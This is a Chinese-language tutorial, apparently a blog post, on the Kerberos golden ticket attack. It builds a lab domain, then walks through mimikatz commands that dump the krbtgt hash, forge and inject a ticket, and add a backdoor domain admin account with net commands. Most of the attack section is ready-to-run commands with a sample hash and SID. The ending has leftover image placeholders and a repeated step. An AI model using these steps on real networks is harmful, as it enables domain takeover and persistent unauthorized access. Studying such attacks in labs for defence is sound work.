黄金票据传递攻击
黄金票据利用的条件:
1、域名称
2、域的SID值
3、域的KRBTGT账号的HASH值(域控主机上)
4、伪造任意用户名 (域用户)
适用场景
黄金票据是身份票据,黄金票据的攻击行为是指攻击者绕过了AS身份认证服务。
由于有些原因导致对域管理权限的丢失,但好在还有一个普通域用户权限,管理员在域内加固时忘记重置krbtgt密码
在正常情况下krbtgt用户的哈希值只会在管理域管主机上才会有,普通域用户上是没有krbtgt哈希的,也就是说不拿到域管是看不到krbtgt哈希。
先拿到域管的权限才能看到krbtgt哈希,才能实现黄金票据传递
模拟伪造身份票据
一、搭建域环境
域控主机:Server-2008
普通域用户:Windows-7
在srever-2008中把域服务器搭建起来
配置静态IP地址
域控主机:196.254.176.184/24;普通域用户:196.254.176.1/24。
都设置成LAN模式下。
1、在 Server-2008 搭建域服务器
网络适配器设置成 LAN 模式
配置静态 IP:196.254.176.184
创建域
在终端中输入命令 dcpromo ,安装活动目录
密码:!a123456
安装完成
开机后在管理工具中打开DNS,目录下自动分配mxy.com。再从新创建主机名称 dc1.mxy.com,IP地址196.254.176.1。
2、回到 wid7 客户机,加入到域环境中(先设置静态 IP 跟 server2008 能 ping 的通)
网络适配器设置成 LAN 模式下
配置静态 IP:196.254.176.1
加入域环境
到此域环境创建好了
二、伪造黄金票据
1、先拿到krebtgt用户的NTLM哈希值(域控主机操作)
mimikatz
工具必须以管理员身份运行(system权限)
启动mimikatz
步骤
1、mimikatz.exe
2、privilege::debug
//列出域管理员账户的哈希值
lsadump::lsa /patch
//krbtgt用户 NTLM 哈希值
f1bb7c2c38b3cd553b4adb3545cb04aa
//域的SID值
s-1-5-21-1856254265-2252388306-3277309693
//生成黄金票据(伪造的黄金票据命令)
kerberos::golden /user:administrator /domain:mxy.com /sid:S-1-5-21-1856254265-2252388306-3277309693/krbtgt:f1bb7c2c38b3cd553b4adb3545cb04aa /ticket:ticket.kirbi
//需要伪造的域管理员用户
/user:
//域名称
/domain:
//SID值,(这里要是使用系统命令的话抓到是这样的SID,最后面的值代表着这个账号的SID值,注意是去掉最后一个-后面的值!)
/sid:
//生成的票据名称
/ticket:
2、在普通域用户中使用mimikatz工具
生成黄金票据.kirbi
文件并保存
输入黄金票据
清除票据
kerberos::purge \\清除票据
kerberos::tgt \\查看票据
导入票据
kerberos::ptt ticket.kirbi \\导入票据
kerberos::tgt \\查看票据
三、创建新用户(hulala),提升权限(域管理员)
切换到cmd终端
whoami //查看本地用户
net user hulala 1234.com /add /domain //在域控中添加用户'hulala'
net user /domain //查看域账户
net group "domain admins" /domain //查看域管理组中的组用户
net group "domain admin" hulala /add /domain //用户'hulala'添加到域管理员组
验证(切换用户)
域用户可以任意的控制域内的主机
2660)]
[外链图片转存中…(img-4XbFNfEw-1706370982660)]
验证(切换用户)
[外链图片转存中…(img-Ke3ywzsR-1706370982661)]
[外链图片转存中…(img-zO3jehmd-1706370982661)]
域用户可以任意的控制域内的主机
[外链图片转存中…(img-khzn35wF-1706370982661)]